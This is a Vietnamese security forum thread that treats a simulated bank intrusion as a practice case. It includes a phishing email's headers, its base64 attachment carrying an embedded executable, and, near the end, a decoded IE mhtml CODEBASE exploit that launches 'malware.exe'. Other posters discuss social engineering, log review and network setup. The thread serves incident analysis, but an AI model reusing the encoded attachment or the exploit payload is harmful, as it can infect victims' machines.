[DIS] Practice #1 :-)

[trihuynh]

Email cua ong khach goi cho Trong.

Return-path: <hhhun@yahoo.com>
Envelope-to: ntrong@aabank.vn
Delivery-date: Sun, 28 Jun 2003 03:47:32 -0400
Received: from h00805f773834.nse.cli.ai.com ([213.61.244.31] helo=hehehe)
by venus.vntoday.org with smtp (Exim 3.36 #1)
id 19MMQW-0006pH-00
for ntrong@aabank.vn; Sun, 28 Jun 2003 02:34:45 -0400
From: <hhhun@yahoo.com>
Subject: FWD: Credit card cua may dda bi mat cap
To: ntrong@aabank.vn
Content-Type: multipart/mixed; boundary="=_NextPart_2rfkindyvnqw3nerasdf"
MIME-Version: 1.0
Reply-To: <hhhun@yahoo.com>
Date: Sun, 28 Jun 2003 03:39:49 -0700
X-Priority: 3
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <E19MMQW-0006pH-00@venus.vntoday.org>

This is a multi-part message in MIME format

--=_NextPart_2rfkindyvnqw3nerasdf
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Credit card cua may dda bi an cap

--=_NextPart_2rfkindyvnqw3nerasdf
Content-Type: application/octet-stream;
name="email.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="email.html

TUlNRS1WZXJzaW9uOiAxLjANCkNvbnRlbnQtTG9jYXRpb246Zm lsZTovLy9tYWx3YXJlLmV4ZQ0KQ29udGVudC1UcmFuc2Zlci1F bmNvZGluZzogYmFzZTY0DQoNClRWcEVBUVVBQWdBZ0FDRUEvLz kxQUFBQ0FBQ1pBQUFBUGdBQUFBRUErekJxY2dBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUENCkFBQUFBQQ0KQUFBQUFBQjVBQUFBbm dBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQQ0KQUFBQUFBDQpBQUFBQUFBQU FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBDQpBQUFBQUENCkFBQU FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUENCkFBQUFBQQ 0KQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ0KQU FBQUFBDQpBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FBDQpBQUFBQUENCkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FBQUFBQUENCkFBQUFBQQ0KQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FBQUFBQUFBQUFBQQ0KQUFBQUFBDQpBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FBQUFBQUFBQUFBQUFBQUFBDQpBQUFBQUENCkFBQUFBQUFBQUFB QUFBQUFBQUFBWmpQQU0vK00wNFBESUxsd1A0N0Q4MmFyak1DTz JMZ0FvSTdBdzJhNUFQb0FBR2EvQUENCkFBQUdhKw0KZ1FJQUFH WXp3R2VLbjBBQkFBQUQyTUhqQkN2WUs5aG13Y2dRQTlpc0E5ak I2d1ZuaUI5SDR0N0R1WUErTS84ejl2Tm1wYw0KTWVCb3pZDQpC YUFQanNDNER3Q08yRFBBWjRvRGkvQy9DZ0M1TEFIenBJdndnOG NVdVN3Qjg2UUhIOE93RTgwUXVnOEFqdHErU0FPNnlBDQpNeXdP NUMNCnVRQUQ4MjdvWFA5bU05dm90ZjlUNkc3L3V0b0Q3S2dJZG Z2c3FBaDArK2lXLzF2K3c3UUJ6UlowNExnREFNMFF1QUJNelMN CkVBQUFBQQ0KQUFBQUFBQUFBQUFBQUFDeHdKQWRlNGpaSm12Q3 dZaTR5YVE2aTMrVGpsd3cyeDg2ZjQxWE04R01zWGVZaWRwcjEx eUdmSw0KdW9qaUxRDQoyYUJlaGRrdW9zTnNZMnhGSkw4aGw0N1 FpaHEvd0pzV0pyS2QxNG90czR3a1NhV05LWjh0aDF6R3gxbzRs NVl0S2hYTnBYDQpQTXJxWmQNCmRhUWlzNStNMTNjbXAxYXd1R1 NFRzFyWkhjNnZOanVZZk1NNFRNQWFJaDdQUm5saVloMTQxODl0 Mm45c29pV1h5RXZDeUQNCk53cFNrYw0KR2J1cGFSaWpOSjlSWX pNYk9uMVhnYjBncWRVakdWVk1WYXBpR2FHSkl5dHJNSEtTT1ZL VXFEVnVWOHJNeU11YndYRkdhMg0KRnJLbjV4DQp4MG10T2srcn dWOFZaNmZFUEllUVdZclhaTWdodmh0c2tMRFljNUZRZFVFOFRG YldQNklz***sbDJIYkdPTFZSdVRPMFNHDQpTRVZxaWcNCnJoMm N3aHVEazl0WlZDSjFjSytlR1g1NE5IMWRxcUZlVlVhN3ZoVEZH a1ZlRkR2RmUyMjdRSUd0ZXRKS2pqMjAxbHlweGkNCmJIbUZqRw 0KZmJzVnZualB4WFI4ZGFvcmR5WEJYNmNqd1lyUDEwbFZWSnVF aWxWZE5SOXhKWko1MWMrQ0xpTmRpeldLVG5ZY3huNG1HYQ0KK2 5NampPDQpTU3dzMEJSbk9TMHBnek9DenEzUHpTZ2FIaml3emtF dWUwaE1LOUtTdmN1WEpMZzV3cHhhMmROakY5ZHhHREF3bG1jY2 5sDQpCRldEQ0wNCnhIK0Zta3pKV0xNZjAxTWdKTW5XMEtoYW9V aVNlOU53c25JcXo3V1B3V010SDI0Y3RyTEFMclltR2JVZ3VWd1 VQY2txVVMNCkI2TzdNcg0KenJnL2tLZ3Z6MDdQYUNnYkZMOXZv aHlGaU5DcVhoaTNHaDdHZjltVWJheTFURm13YnNCTlBhVEFXcE JsT0ZNNFlZSEtwRA0KeVdLRWw0DQpobFF2WXk1Q1psY29LNVcv V0Y1UmxWNmlQWEhKcU0ydXdWVFV2Q3FjZHA1RG5vU1NxNlE3Rz crNWRXVmVzenlNbEVHMWs3DQpoWjI4S0gNCjFYWmdZVHRIcVJW K2xxSTRZR0tBbXlwZXk2ZHZSNE0yZ285eUdEZVBJRTdZbnJHYm hUNmpjRitLVkZzdHhxaW5hSTJVSGsNClNrRm9POA0KbVZnK3ha NFZUNXg0T21wL0tqS2ZTREJIV1cwOXFraDlycS9iY3FqWjBTcV l0VW04Tm1zWFJkSSsyemV4WjRDZ21aMlRpWg0KT1FpSkJIDQpX R1ZheE1pQUxvQ2dqM2VhWGsvVHM1STZnUnROelN2WW9WdWZZej dXcHhkVmZIUEprTVV6aFlLeU9YaGt3VHpDZDRCTklUDQplV0tX bEsNCnhrcFR3bVdVYUZTTXAyaDBRSG5IVVZGampvMk5rbHMzTU hKeVI2S09zWVJSSGFKTEpsTllmRnl4T3Blc1ZyZkVRcncvWlkN CklBQUFBQQ0KQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQQ0KQUFBQUFBDQpBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBDQpBQUFBQUENCkFBQUFBQUFBQUFBQUFBQUFBQU FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUENCkFBQUFBQQ0KQUFBQUFBQUFBQUFBQU FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQQ0KQUFBQUFBDQpBQUFBQUFBQU FBQVBBQUFRQUFBUkFBQVNBQUFUQUFBVUFBQVZBQUFXQUFBWEFB QVlBQUFaQUFBYUFBQWJBQUFjQUFBZEFBDQpBZUFBQWYNCkFBQW dBQUFoQUFBaUFBQWpBQUFrQUFBbEFBQW1BQUFuQUFBb0FBQXBB QUFxQUFBckFBQXNBQUF0QUFBdUFBQXZBQUF3QUENCkF4QUFBeQ 0KQUFBekFBQTBBQUExQUFBMkFBQTNBQUE0QUFBNUFBQTZBQUE3 QUFBOEFBQTlBQUErQUFBL0FBQS9BQUEvQUFBL0FRQS9BZw0KQS 9Bd0EvDQpCQUEvQlFBL0JnQS9Cd0EvQ0FBL0NRQS9DZ0EvQ3dB L0RBQS9EUUEvRGdBL0R3QS9FQUEvRVFBL0VnQS9Fd0EvRkFBL0 ZRDQpBL0ZnQS8NCkZ3QS9HQUEvR1FBL0dnQS9Hd0EvSEFBL0hR QS9IZ0EvSHdBL0lBQS9JUUEvSWdBL0l3QS9KQUEvSlFBL0pnQS 9Kd0EvS0ENCkEvS1FBLw0KS2dBL0t3QS9MQUEvTFFBL0xnQS9M d0EvTUFBL01RQS9NZ0EvTXdBL05BQS9OUUEvTmdBL053QS9PQU EvT1FBL09nQS9Pdw0KQS9QQUEvDQpQUUEvUGdBL1B3QS9Qd0Ev UHdBL1B3RS9Qd0kvUHdNL1B3US9Qd1UvUHdZL1B3Yy9Qd2cvUH drL1B3by9Qd3MvUHd3L1B3DQowL1B3NC8NClB3OC9QeEEvUHhF L1B4SS9QeE0vUHhRL1B4VS9QeFkvUHhjL1B4Zy9QeGsvUHhvL1 B4cy9QeHcvUHgwL1B4NC9QeDgvUHkNCkEvUHlFLw0KUHlJL1B5 TS9QeVEvUHlVL1B5WS9QeWMvUHlnL1B5ay9QeW8vUHlzL1B5dy 9QeTAvUHk0L1B5OC9QekEvUHpFL1B6SS9Qeg0KTS9QelEvDQpQ elUvUHpZL1B6Yy9QemcvUHprL1B6by9QenMvUHp3L1B6MC9Qej QvUHo4L1B6OD0NCg0KPCEtLSAyNS4wMi4wMyAtIGh0dHA6Ly93 d3cubWFsd2FyZS5jb20gLS0+DQo8dGl0bGU+bWFsd2FyZS5jb2 08L3RpdGxlPg0KPGJvZHkgYmdjb2xvcj1ibGFjayBzY3JvbGw9 bm8+DQo8U0NSSVBUPg0KLy8yNS4wMi4wMyAtIGh0dHA6Ly93d3 cubWFsd2FyZS5jb20NCmZ1bmN0aW9uIG1hbHdhcmUoKQ0Kew0K cz1kb2N1bWVudC5VUkw7cGF0aD1zLnN1YnN0cigtMCxzLmxhc3 RJbmRleE9mKCJcXCIpKTsNCnBhdGg9dW5lc2NhcGUocGF0aCk7 DQpkb2N1bWVudC53cml0ZSggJyA8dGl0bGU+bWFsd2FyZS5jb2 08L3RpdGxlPjxib2R5IHNjcm9sbD1ubyBiZ2NvbG9yPWJsYWNr PjxGT05UIGZhY2U9IkNvbWljIFNhbnMgTVMiIGNvbG9yPXJlZC BzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7dG9wOjIwO2xlZnQ6 OTA7ei1pbmRleDoxMDA7IGZvbnQtc2l6ZToyY207Ij5tYWx3YX JlLmNvbSA8L2NlbnRlcj48b2JqZWN0IHN0eWxlPSJjdXJzb3I6 Y3Jvc3MtaGFpciIgYWx0PSJtb28gaGEgaGEiIGNsYXNzaWQ9Im Nsc2lkOjY2NjY2NjY2LTY2NjYtNjY2Ni02NjY2IiAgQ09ERUJB U0U9Im1odG1sOicrcGF0aCsnXFxtYWx3YXJlLmh0bWwhZmlsZT ovLy9tYWx3YXJlLmV4ZSI+PC9vYmplY3Q+JykNCn0NCnNldFRp bWVvdXQoIm1hbHdhcmUoKSIsMTUwKQ0KPC9zY3JpcHQ+DQoNCg 0KDQog

[mRrO]

xin hỏi mấy câu sau đây:
1. tại sao khi vừa nhắc đến file .htaccess thì Trọng biết đó là file nào liền ? webserver chỉ có một file .htaccess duy nhất ? và mục đích sử dụng của file đó ?
2. có thể nói rõ hơn về quan hệ giữa Trọng, Hùng, Thảo và Hạnh ? ví dụ như Trọng có quen biết Thảo trước đó hông ? Hùng và Thảo quen biết ra sao ? Hehe, có chi tiết rất lạ là Hạnh cũng có vẻ thích xài tiếng Anh lẫn lộn tiếng Việt như Thảo, Trọng có thắc mắc chuyện này hông ?
hehe, chi tiết Thảo rủ Trọng đi ăn tối rất hay ). Trọng là CCIE mà chẳng có security in mind gì hết, ngay cái chi tiết attachment 66kb mà chỉ có mỗi một dòng chữ là đủ để phải tức tốc kiểm tra rồi. Ngòai ra kẻ tấn công cũng chẳng phải là người cẩn thận, nếu Trọng cẩn thận một tí kiểm tra cái attachement (điều này là bắt buộc làm đối với một người ở vào vị trí quan trọng như Trọng) thì sẽ dễ dàng burn the source.

[trihuynh]

MrOr có vẽ quan tâm đến lãnh vực social engineering quá ha. Là một người quản trị mạng cũng như là Webmaster, việc check .htaccess thuong xuyen cũng rat can vi dde kiem tra xem file co' bi thay đổi không vì nếu bị thay đổi thì fcó khả năng hacker vào được các protected directory trong web server.
Social ENgineering minh sẽ nghiên cứu sau (mặc dù nó rất interesting trong trường hợp này). :-) Thank for remind me that Mrror.

TO $$$, minh nghi lotus note client ít bị virus hơn OUTLOOK vi OUTLOOK intergrate với IE mà IE thì đầy bugs. Lotus Note nếu chỉnh cái ECL đúng thì cũng secure lắm. Thank for sharing your experience.

[mRrO]

cho coi sơ qua cái file log access và error của apache nhé. xem 10 dòng trước khi bị hack và 10 dòng sau khi bị hack.
xem log file chắc chắn sẽ xác định được IP của kẻ tấn công, hehe tại vì một lỗi rất thường gặp phải của các defacer: luôn là người đầu tiên access vào xem "tác phẩm" của mình.
àh thêm một tí, máy của admin nằm chung với 40 máy con trong cái Intranet, máy này luôn được mở 24/24 ?

[yuna_admirer]

Một CCIE Routing&Switching chưa chắc là giỏi về Security. Và mức Security dạy trong trình độ CCIE security cũng chỉ dừng lại ở các loại tấn công, config firewall (Dedicated or IOS based), các loại IDS - là nhiều lắm rồi.

Trí có thể post 3 cái :

Vì Trọng là CCIE, vậy sure là hệ thống chạy Cisco rồi. Trí cho mình biết rỏ :

- Gateway Router là gì ? Có config hay không ?
- Firewall ở đây là gì ? Có config hay không ?
- Trong hệ thống lớn như thế, không có cái IDS ?

Vị trí của máy của Trọng trong hệ thống ? Máy của trọng nằm chung vùng DMZ với Webserver hay trong Internal ? Máy của Trọng cài chương trình gì ? IE version mấy ? Security của IE set ra sao ? Java/VBscript are allowed ?

[yuna_admirer]

Bài viết được gửi bởi mRrO
Hacker luôn là người đầu tiên access vào xem "tác phẩm" của mình.

Good .

[achxi]

1. trihuynh kể chuyện CÓ NỘI DUNG THỜI THƯỢNG hay lắm, bái phục, tối kể chuyện cho con nghe đùng có kể mấy chuyện này nghe cha ?!?!?!

2. Việc suy luận ra ai là thủ phạm tui không dám bàn vì tui không phải là xơ-lôc-hôm. Người có lỗi trong vụ này LÀ NGƯỜI KHÔNG THẬN TRỌNG KHI NHẬN MAIL CÓ ATTACK. Nếu có suy nghĩ như Trọng nghĩ thì nên bắt anh chàng đi học thêm một lớp CĂN BẢN về security.

3. Cách khắc phục thì rất dễ vì chỉ cần ngồi trên web-server là xong. Khắc phục ... hậu quả của nó mới thành vấn đề.

4. Các bạn thử tìm hiểu kỹ cái mail trihuynh gởi kèm, rất là thú vị đấy, phải không tride@ ... dô dô dô àlê alế àlê .....

achxi@

[yuna_admirer]

Hix, Malware.exe <--F***,

Để Decode típ

[achxi]

P/S: Nếu thật sự có bằng CCIE mà được mấy em thơm như múi mít mê như trihuynh kể thì tui cũng ráng một phen cho khỏi uổng kiếp người quá ...

hehehe
achxi@

[yuna_admirer]

<title>malware.com</title><body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">malware.com </center><object style="cursor:cross-hair" alt="moo ha ha" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:\malware.html!file:///malware.exe"></object>